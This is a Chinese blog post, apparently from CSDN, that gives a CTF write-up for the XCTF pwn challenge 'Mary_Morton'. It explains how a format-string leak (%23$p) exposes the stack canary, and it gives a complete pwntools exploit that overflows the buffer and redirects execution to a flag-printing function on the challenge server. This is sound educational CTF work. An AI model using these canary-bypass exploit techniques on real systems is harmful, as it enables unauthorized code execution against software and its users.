攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制

最新推荐文章于 2021-11-16 22:05:42 发布
最新推荐文章于 2021-11-16 22:05:42 发布
阅读量999 收藏 7
点赞数 2
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/114339627
版权

在这里插入图片描述ctf(pwn) canary保护机制讲解 与 破解方法介绍

程序执行流程

在这里插入图片描述有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次;

IDA分析

在这里插入图片描述在这里插入图片描述

解题思路

程序存在canary保护,利用格式化字符串漏洞 得到canary的位置, 在利用栈溢出覆盖它,返回地址改为目标函数 4008da
在这里插入图片描述

EXP

from pwn import *
r=remote('111.200.241.244',58448)
r.sendlineafter("3. Exit the battle ",'2')     #先进入格式化字符串利用
r.sendline("%23$p")
r.recvuntil("0x")
canary=int(r.recv(16),16)      #长度16位      取16进制
r.sendlineafter("3. Exit the battle ",'1')     #再进入栈溢出利用
payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)
r.send(payload)
r.interactive()

EXP解读

  1. r.sendline("%23$p")
    0x90-8h=0x88
    在这里插入图片描述

0x88/0x8=0x11(十进制17)
这里除以8是因为(我翻了一下汇编语言这一本书):

8bit组成1个Byte,也就是一个字节

微型机存储器的存储单元可以存储一个字节,即8个二进制位

一个存储器有128个存储单元,它可存储128个字节

往后找17+6=23个地址上即存canary的值

这里加6是 print输入的偏移量
可以看看 CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb

2.payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)

在这里插入图片描述

有问题的评论区留言吧,我会回的❄

半岛铁盒@
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
二进制漏洞挖掘之溢出-开启Canary
ylcangel的专栏
10-18 1082
二进制漏洞-溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
最新发布
WdIg-2023的博客
04-09 1918
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
Mary_Morton write up(pwn 64位格式化字符串溢出
weixin_43742794的博客
08-06 835
Morton.dms 首先用gdb(已安装peda)打开文件 用checksec检查可执行文件属性 CANNARY(保护) 即是否在中插入了cookie(linux中称为canary FORTIFY 防止缓冲区溢出攻击 不常见 NX(Windows平台上称其为DEP)即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入she...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 916
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2194
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在上设置一个标志,标志的位置: EIP EBP canary logol ··· 的其他内容 开了NX,不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关溢出的函数: 可以利用溢出的buf的位置:rbp
pwn学习总结 溢出canary绕过和格式化字符串
MrTreebook的博客
11-07 690
pwn学习总结 溢出canary绕过和格式化字符串 目录pwn学习总结 溢出canary绕过和格式化字符串1. checksec看一下保护2. IDA 看一下3. dgb动态调试3.1. gdb打开canary文件,断点先下在main函数上3.2. disass命令查看一下func函数的汇编代码3.3. 首先看一下canary的偏移是多少3.4. 在上面的func函数的汇编代码中可以看到canary的偏移量是多少3.5. 看一下canary的地址3.6. 看一下,计算一下溢出量4. exp 1.
mary_morton
pppp974的博客
07-22 1103
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
PWM-OUT.rar_PWN_out
09-19
原子 的PWN 输出,寄存器程序,完全寄存器操作,可以直接打开。
Mary_Morton(xctf)
weixin_43868725的博客
06-12 371
程序保护和流程 保护: 流程: main() 如果输入1会进入 这个函数有一个溢出漏洞。 如果输入2会进入 这个函数有一个格式化字符串漏洞。 还有一个cat_flag的函数 0x1 利用过程 首先这个程序开启了canary,所以直接溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用溢出漏洞
xctf高手进阶第二题 Mary_Morton
neuisf的博客
01-23 355
启动运行时输出提示有三个选项,分别是:1.缓冲区溢出漏洞;2.格式化字符串漏洞;3.退出。 解题方法:因为缓冲区溢出在main函数中,利用格式化字符串漏洞读取main函数的canary利用缓冲区溢出运行0x4008DA处的system (/bin/cat flag)指令。 exp: from pwn import * p=remote('111.198.29.45'...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1559
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1521
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 311
格式化字符串泄露canary溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个溢出漏洞 checksec了一下有canary保护,开启了canary,就不能直接利用溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
作业5:溢出格式化字符串溢出
diligent_lee的博客
07-20 507
信息安全实践作业5:溢出格式化字符串溢出 1. 实验一 根据实验一的题目要求,将数组 buffer1 的大小改为 50,将语句 x=1 改为 x=(x+5)*2。如下所示: 运行结果为: 然后进行gdb 调试: 通过 b 5 命令对程序第五行的语句 ret = buffer1 + 12 打断点,然后查看当前 $ebp 和 buffer1 的地址,不难得出,$ebp-buffer1=0xbffffd48-0xbffffd00=0x48=72,而且retip=$ebp+4。所以 retip=buf
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6185
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值